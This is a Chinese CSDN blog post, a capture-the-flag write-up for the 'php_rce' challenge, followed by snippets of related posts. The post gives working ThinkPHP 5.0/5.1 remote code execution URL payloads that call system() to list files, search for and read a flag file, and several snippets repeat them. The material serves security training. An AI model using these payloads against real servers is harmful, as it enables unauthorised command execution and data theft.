WEB:php_rce

已于 2023-07-30 14:10:21 修改
阅读量970 收藏 1
点赞数
分类专栏: 攻防世界 文章标签: php 开发语言 web安全 网络安全
于 2023-07-30 14:09:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gsumall04/article/details/132006406
版权

背景知识

        Linux命令

        thinkPHPv5漏洞

题目

 打开页面,页面显示为thinkphp v5的界面,可以判断框架为thinkPHP,可以去网上查找相关的漏洞

由题目可知,php rec是一个通过远程代码执行漏洞来攻击php程序的一种方式

因为不知道是php版本几,先尝试一下

使用thinkPHP 5.1的漏洞

payload

 /?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

提示为5.0.2版本

payload

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

 

 说明命令执行成功

接着抓取flag

payload

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"

由页面提示可知,flag储存在flag文件下的flag文件中

用cat命令读取flag

payload

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

 得到flag

参考学习链接:

攻防世界-web篇(php_rce)详解_渗透小剑客的博客-CSDN博客

https://www.cnblogs.com/qiushuo/p/17454519.html

sleepywin
关注
专栏目录
网络安全 | CTF】攻防世界 php_rce 解题详析
等风来
05-22 5922
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),此时通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。由上图可知,flag字段储存在flag文件夹下的flag文件中。使用thinkphp 5.1.payload进行尝试,根据提示,使用5.0.20版本的Payload。说明命令执行成功,接着抓取flag即可。
攻防世界:WEB——php_rce
Zeker62的博客
08-16 152
上午刚学的RCE,这就派上用场了: https://blog.csdn.net/ZripenYe/article/details/119732562 RCE就是远程代码运行: 当然,上面是基础知识,本题才是实战: 观察题目 这个大大的ThinkPHP V5写在这里,就说明很可能需要利用这个漏洞: 谷歌搜索一下就能找到我们要的POC: 借鉴:https://learnku.com/articles/21227 http://111.200.241.244:50462/index.php?s=index/th
攻防世界web进阶_php_rce
chy082的博客
08-21 334
上网查一下ThinkPHP v5,发现有rce漏洞 找到网上的payload: /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir 看看上级目录 http://220.249.52.133:37949/?s=index/\think\app/invokefunction&function=call_user_func_array&v
攻防世界web新手关之php_rce
weixin_45746283的博客
11-16 672
攻防世界web新手关之php_rce
攻防世界web高阶(php rce
ctfmove1的博客
07-16 629
需要自己百度下thinkphp5的漏洞(其实看完就知道怎么做这个题目了) payload: s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name “*flag” 先查找关于flag在哪 s=index/think\App/invokeFunction&function=call_user_func_array&vars
攻防世界web高手进阶区 php_rce
weixin_61835841的博客
04-21 1770
工具 火狐 1.打开链接,观察到这是一个Think PHP V5 框架 2.尝试输入index.php,发现页面没有变化,继续输入下一级文件(随便输入),发现爆出了版本5.0.20 3.查询相关版本的漏洞(百度或者github)都可以试试 、 查询到的payload:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls 放进去尝试发现可
Firmware_web_rce_finder:FWRF是用于固件Web端分析的开源工具
05-13
固件Web Rce Finder FWRF(不要尝试将其发音)是用于固件... 检查rce:尝试通过那些参数执行基本代码 测试服务器:启动测试服务器以进行手动搜索 Rce检查 服务器在攻击者端启动(侦听端口10020)并等待tcp数据包。 发
攻防世界 web进阶 php_rce 【远程命令执行 thinkphp5 rce漏洞】
Hrain7的博客
11-15 940
是远程命令执行 thinkphp5 rec漏洞 具体执行语句可参考大佬的博客 ThinkPHP 5.x远程命令执行漏洞分析与复现 - 渗透测试中心 - 博客园 其实就在网上搜一下thinkphp5 rec漏洞 改一下payload 就行 ...
XCTF系列 // Web | php_rce & Web_python_template_injection
qq_45805420的博客
07-26 274
前言 这两题涉及到的知识点有,ThinkPHP 的远程代码执行漏洞 以及 flask的 SSTI 漏洞(服务端模板注入) 。   由于水平有限,关于以上内容的了解均只到表面,具体漏洞原理尚未看明白,详细分析只好以后再补,在这里先参照网上的 writeup,照猫画虎,略微整理分析一下解题思路与流程。 1` php_rce ThinkPHP 是一个轻量级国产 PHP 开发框架,它可以支持 windows/Unix/Linux 等服务器环境。在 ThinkPHP 5 中出现了由于变量覆盖而引起的 RCE(远程命令
thinkphp5 rce
weixin_51558394的博客
08-17 490
thinkphp5 rce
ThinkPHP5.x rec 漏洞分析与复现
MercyLin的博客
09-27 7540
https://help.aliyun.com/noticelist/articleid/1000081331.html?spm=5176.2020520001.1004.7.2e874bd363uLuf 先贴个漏洞预警,这里做一些内容摘要: 漏洞描述 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell。...
Think PHP 5 RCE漏洞复现及排查
dayouzi的博客
08-11 2511
ThinkPHP是一款运用极广的PHP开发框架。其漏洞点是由于ThinkPHP框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞。
ThinkPHP语言模块RCE漏洞复现
0xSec
12-25 3711
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。
ssrf的gopher+redis未授权+thinkphp5的rec漏洞+docker创建ubuntu容器+ 通过cookide简单绕过+Crontab定时任务提权
一大口木的博客
11-13 339
ssrf的gopher+redis未授权+thinkphp5的rec漏洞+docker创建ubuntu容器+ 通过cookide简单绕过+Crontab定时任务提权。
攻防世界-Web题目1(ThinkPHP V5框架漏洞、php伪协议)
最新发布
weixin_54055099的博客
07-18 679
ThinkPHP V5的框架漏洞、php伪协议
thinkPHP_V5漏洞
qq_53099802的博客
04-28 3829
php_rce攻防世界
NSSCTF-Web题目7(ThinkPHP V5 框架漏洞)
weixin_54055099的博客
06-07 1385
NSSCTF部分题目
ThinkPHP语言模块文件包含RCE复现详细教程
ALLEN'Blog
02-14 2188
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
ThinkPHP V5(漏洞解析及利用)及tornado知识点
qq_62046696的博客
10-03 3614
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。
攻防世界php_rce
08-26
- *1* *2* *3* [攻防世界-web篇(php_rce)详解](https://blog.csdn.net/qq_54803507/article/details/127041653)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值